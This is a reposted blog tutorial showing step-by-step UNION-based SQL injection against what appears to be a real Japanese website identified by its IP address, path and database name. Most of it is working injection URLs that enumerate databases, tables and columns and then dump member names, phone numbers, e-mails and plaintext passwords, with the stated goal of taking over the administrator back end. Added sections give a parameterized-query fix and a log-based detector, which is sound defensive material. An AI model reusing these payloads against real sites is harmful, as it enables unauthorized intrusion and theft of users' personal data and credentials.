3-6 SQL injection website instance, step 5: break through the back end to obtain web administrator permissions

2022-06-30 01:07:00 Mountain Rabbit 1

Once we have found the injection point and tested it thoroughly, the goal of the test is to obtain confirmed information: it can display the database information we want, all table information and all field information, and we can even obtain the permissions of the back-end administrator. This article solves that problem.

Use the injection point to dump the database and obtain back-end administrator permissions

1. Get the names of all databases on the current connection

We are still testing at this injection point. We need to query all databases, so we read the schemata table under information_schema; the other positions we leave blank for now, and we use single quotation marks here:

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(schema_name,char(10),'',char(10),'',char(10),'',char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.schemata limit 1,10--
&mid=1

So let's run it.

All database names on the server the current connection belongs to are displayed. We asked for rows 1 to 10, but in fact there are only six; with that, we have all the database names.

Let's summarize:

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(schema_name,char(10),'',char(10),'',char(10),'',char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.schemata limit 1,10--
&mid=1

We obtain the names through concat and schema_name. Having queried the schemata table and obtained all the database names, we next want all the tables in the current database.

2. Get all the table names of the current database

First the database the table lives in, table_schema; then table_name; then table_rows, the number of rows the table has; then the table's comment, table_comment, if there is one. We still search the tables view, with where table_schema=database():

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() --
&mid=1

Let's run it first and look at the results.

We found them all: there are 10 pages, meaning the current database has many tables. That makes our analysis harder, because we want the back-end administrator's password, and with so many tables and so much information, finding which table it is kept in is somewhat difficult.

Let's summarize first.

Get all tables of the current database, the database each table belongs to, the row count of each table and its functional comment:

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() limit 1,10--

Next, we hope to find the table in which the web back-end administrator's password may be stored.

3. Find the table where the web back-end administrator's password may be stored

We just saw too many tables, so let's guess. Since such a table is usually a user table, its name may contain user or member. We add and table_name like ... to see whether like queries are supported, and first check whether there is a table like user:

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() and table_name like '%user%'--
&mid=1

We see that there is indeed one: MAG_user. This may be the administrator's table; copy it and save it.

Now let's look at member:

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() and table_name like '%member%'--
&mid=1

We see that there is a member table. Of course there are other similar ones, but this is the most likely one.

At this point we have concluded that there are two possible tables for the web back-end administrator: the member table and the MAG_user table found just before.

Good, let's summarize now.

Get all tables of the current database, the database each table belongs to, the row count of each table and its functional comment:

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() and table_name>='a' and table_name<'b' limit 1,10--

In this second part we obtain the tables the administrator may be in, then use a where query, or a range query, to find out which table is the real one. Next we analyze the two tables: does the table hold the administrator, or other users? We keep the table where the user name and password are stored. So the next step is to get all the fields of the user table.

4. Get all the fields of the user table

The view we look up is called columns; table_schema is the current database, and the table name we set equal to member. The one in front is called column_name, the field name. We also fetch the field comment, if there is one; comments may help us, because they explain what the field is for. So let's run it:

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),column_name,char(10),column_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.columns where table_schema=database() and table_name='member'--
&mid=1

We found all the fields of the member table; we see PWD among them.

There are many fields here, but that helps us a lot: we now have all the fields along with their function and meaning, and we are basically clear about them, for instance this is the mobile number, this is the mailbox, this is the password.

Next, let's look at the mag_user table:

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),column_name,char(10),column_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.columns where table_schema=database() and table_name='mag_user'--
&mid=1

We find that this table holds the administrator's ID, member name, collaborator name, e-mail and login flag. Analyzing all the fields of the two tables, we can confirm that the final back-end administrator user name and password are in the member table. So the next step is to get the back-end administrator's user name and password.

Let's summarize.

Get all fields of the user table, the field count and the functional comments of the fields:

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),column_name,char(10),column_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.columns where table_schema=database() and table_name='member' limit 1,10--

For all fields of the user table we set table_schema equal to the current database and table_name equal to member. This is the final back-end administrator we confirmed; his user name and password are in the member table.

5. Get the web back-end administrator's user name, password, mailbox and other sensitive information

In this step we take the member table we just typed in, put it in, and get this information. Let's see:

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),column_name,char(10),column_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.columns where table_schema=database() and table_name='member'--
&mid=1

The query we ran selected from the columns view for the member table. Let's modify it so that we select directly from the member table, showing the first 100 rows, and display member_name, mobile, email and pwd. Let's run it first and see whether it finds anything:

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(member_name,char(10),mobile,char(10),email,char(10),pwd),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from member limit 1,100--
&mid=1

We see it is empty. The empty result tells us something: we already know the dictionary tables can be queried and that we are connected to the current database, so we have the necessary permissions. The reason nothing is displayed may be that the fields need handling: if member_name is blank, how did the program deal with it? (In MySQL, concat returns NULL as soon as any of its arguments is NULL.) So we handle this possible emptiness with ifnull: if member_name is null, display hxf_name instead, and so on for each field one by one. Let's see:

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(ifnull(member_name,'hxf_name'),char(10),ifnull(mobile,'hxf_mob'),char(10),ifnull(email,'hxf_em'),char(10),ifnull(pwd,'hxf_pwd')),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from zakkanet.member limit 1,100--
&mid=1

We see that the rows have come out, and this information is very sensitive. If there is no mobile number, hxf_mob is shown; of course it may not be displayed here. We see that the password is in plaintext. For us, and for the website, this is quite important: if the password is stored in clear text, it helps the SQL injection attacker a lot, because he gets the plaintext password directly, and with the plaintext password he can log in to the back end. At this step we have obtained all the user names, including mobile phone, mailbox and password, so the administrator is among them as well. Administrators may include admin and the member table; the administrator may be admin or another super administrator, which I won't show here, because the users' and the back-end administrator's user names and passwords are all here.

Through a where condition, find out whether member_name is like admin; once found, we finally get the administrator's password and permissions.

Let's summarize:

union select 1,2,3,4,5,6,7,8,9,concat(ifnull(`MEMBER_NAME`,'null'),char(10),ifnull(`MOBILE`,'null'),char(10),ifnull(`E_MAIL`,'null'),char(10),ifnull(`PWD`,'null'),char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from `ZAKKANET`.`MEMBER` limit 1,10--

We finally got the web back-end administrator's user name, password, mailbox and other sensitive information. All of this has been achieved. Fortunately this website's passwords are in plaintext; after getting the plaintext password we can log in to the back end directly. At this point we can crack this website, that is, successfully invade it; once we log in through the back end, we have successfully controlled the website.
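The root cause of the whole procedure above is the same on every step: the tksid parameter is pasted into the SQL text, so a crafted value turns one query into a UNION of two. The following is an added example written for this page, not code from the tutorial or from the site it describes. SQLite stands in for MySQL, and the tokusyu and member tables with their rows are constructed sample data. It places the vulnerable construction next to two fixes: binding the value as a parameter, and rejecting non-integer ids before they reach the database. The payload is shaped like the page's queries but uses three columns instead of 36.

```python
"""Vulnerable string-built query next to its parameterized fix (added example).

SQLite stands in for MySQL; the tables and rows below are constructed sample data."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build an in-memory database shaped like the page's scenario (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE tokusyu (tksid INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE member (member_name TEXT, mobile TEXT, email TEXT, pwd TEXT);
        INSERT INTO tokusyu VALUES (473, 'Feature 473', 'public content');
        INSERT INTO member VALUES ('admin', NULL, 'admin@example.test', 'plaintext-secret');
        INSERT INTO member VALUES ('alice', '000-0000', 'alice@example.test', 'hunter2');
        """
    )
    return conn


def fetch_feature_unsafe(conn: sqlite3.Connection, tksid: str) -> list:
    """The defect the page exploits: the request parameter is pasted into the SQL text."""
    sql = f"SELECT tksid, title, body FROM tokusyu WHERE tksid={tksid}"
    return conn.execute(sql).fetchall()


def fetch_feature_safe(conn: sqlite3.Connection, tksid: str) -> list:
    """Fix 1: bind the value as a parameter; it is compared as data, never parsed as SQL."""
    sql = "SELECT tksid, title, body FROM tokusyu WHERE tksid=?"
    return conn.execute(sql, (tksid,)).fetchall()


def parse_tksid(raw: str) -> int:
    """Fix 2: validate the type at the edge; tksid is an integer id and nothing else is accepted."""
    if not raw.isdigit():
        raise ValueError(f"invalid tksid: {raw!r}")
    return int(raw)


# Constructed payload in the shape the page uses (three columns here instead of 36).
PAYLOAD = (
    "473 and 1=2 union select member_name, ifnull(mobile,'hxf_mob'), pwd "
    "from member --"
)


def demo() -> tuple:
    """Run both code paths against the same input and return what each yields."""
    conn = make_db()
    leaked = fetch_feature_unsafe(conn, PAYLOAD)  # the UNION appends member rows to the result
    safe = fetch_feature_safe(conn, PAYLOAD)      # whole string compared to tksid: no row matches
    try:
        parse_tksid(PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True                            # never reaches the database at all
    return leaked, safe, rejected


if __name__ == "__main__":
    for label, value in zip(("unsafe", "safe", "rejected"), demo()):
        print(f"{label}: {value}")
```

Both fixes belong together: the bound parameter removes the injection regardless of input, and the type check gives the application a clean place to log and refuse malformed ids, which is also where the detection signal in the next sections comes from.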

Next step 1: suppose what we obtained from this website were not a plaintext password but an md5 hash; then we would need to take the md5 and compare it against an online md5 database to obtain the plaintext password.

So in fact we do not need this step here.

Next step 2: log in directly as the web back-end administrator; then we have the administrator's permissions, and SQL injectors can do whatever they want.

But our goal is mainly security, so this article does not demonstrate this step.

Warning: any successful intrusion into a back end is illegal and is not the purpose of this tutorial. The goal of this tutorial is to prevent intrusion; you bear all the consequences of invading a website's back end.

6. Summary

1. Get the names of all databases on the current connection and all table names

2. Get the sensitive-information tables and fields in the current database

3. Obtain all user names, passwords, mailboxes, mobile phones and other sensitive information, including the web back-end administrator's.
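Every step summarized above leaves the same footprint in the web server's access log: a numeric parameter carrying union select, information_schema, char() or concat() and a trailing comment. The following detection is an added example for this page, not code from the tutorial or the site it describes. The log lines are constructed in Apache combined format with placeholder client addresses; only the request path and parameter names are taken from the page. It decodes each query-string parameter and flags the request when at least two independent indicators co-occur, which keeps a single stray "--" in legitimate data from firing on its own.

```python
"""Flag information_schema / UNION enumeration in web access logs (added example)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines: one benign request, two shaped like the page's enumeration steps,
# and another benign request from a different client.
LOG_LINES = [
    '203.0.113.5 - - [30/Jun/2022:01:07:00 +0800] "GET /corp/tokusyu.php?page=2&cnt_all=100&tksid=473&mid=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [30/Jun/2022:01:07:05 +0800] "GET /corp/tokusyu.php?page=2&cnt_all=100&tksid=473%20and%201%3D2%20union%20select%201,2,3,concat(schema_name,char(10))%20from%20information_schema.schemata%20limit%201,10--&mid=1 HTTP/1.1" 200 5300',
    '203.0.113.5 - - [30/Jun/2022:01:07:09 +0800] "GET /corp/tokusyu.php?tksid=473+and+1%3D2+union+select+1,2,3+from+information_schema.tables+where+table_schema%3Ddatabase()+and+table_name+like+%27%25member%25%27--&mid=1 HTTP/1.1" 200 5400',
    '198.51.100.9 - - [30/Jun/2022:01:08:00 +0800] "GET /corp/tokusyu.php?page=3&cnt_all=100&tksid=474&mid=1 HTTP/1.1" 200 5100',
]

# Apache combined log prefix: client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Independent indicators; each one alone is weak, two or more together are a strong signal.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b"),
    "string_builder": re.compile(r"\b(?:concat|char)\s*\("),
    "database_fn": re.compile(r"\bdatabase\s*\(\s*\)"),
    "comment_terminator": re.compile(r"--|/\*"),
}


def normalise(value: str) -> str:
    """Lower-case and collapse whitespace so spacing tricks do not split a keyword pair."""
    return re.sub(r"\s+", " ", value.lower())


def indicators_for(value: str) -> list:
    """Return the names of all indicators present in one decoded parameter value."""
    text = normalise(value)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_log(lines, threshold: int = 2) -> list:
    """Decode every query parameter of every request; report those meeting the threshold."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            found = indicators_for(value)
            if len(found) >= threshold:
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": parts.path,
                    "param": param,
                    "indicators": found,
                })
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(f"{hit['ip']} {hit['time']} {hit['path']} param={hit['param']} {hit['indicators']}")
```

Decoding before matching matters: the page's payloads arrive with %20, %3D and + encodings, so a pattern applied to the raw request line misses them. Correlating hits by client address and time then shows the enumeration sequence (schemata, tables, columns, data) as one incident rather than isolated alerts.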

From this process we already know that for an advanced hacker using MySQL injection, getting back-end permissions is not hard. Of course, for the visible (error-based) attack we used it is obviously easier; for blind injection it is relatively difficult. But whether the injection is visible or blind, the principles are the same.

However, sometimes it is relatively difficult for us to look for an injection point, or to attack one, and our technique also has certain limitations. That is when tools are needed.

Original site

Copyright notice
This article was written by [Mountain Rabbit 1]; when reposting, please include the original link. Thank you.
https://yzsam.com/2022/02/202202160759023733.html